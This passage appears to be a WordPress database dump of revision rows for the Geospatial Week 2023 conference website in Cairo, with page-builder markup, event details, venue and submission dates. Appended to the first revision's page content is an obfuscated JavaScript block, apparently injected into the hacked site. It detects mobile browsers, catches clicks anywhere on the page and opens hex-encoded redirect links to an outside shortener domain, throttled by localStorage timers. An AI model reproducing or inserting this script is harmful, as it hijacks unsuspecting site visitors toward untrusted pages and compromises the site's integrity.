img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 00:58:45','2023-02-04 00:58:45','',3066,'https://gsw2023.com/?p=3729',0,'revision','',0),
(3730,1,'2023-02-04 01:16:23','2023-02-04 01:16:23','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h4>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px 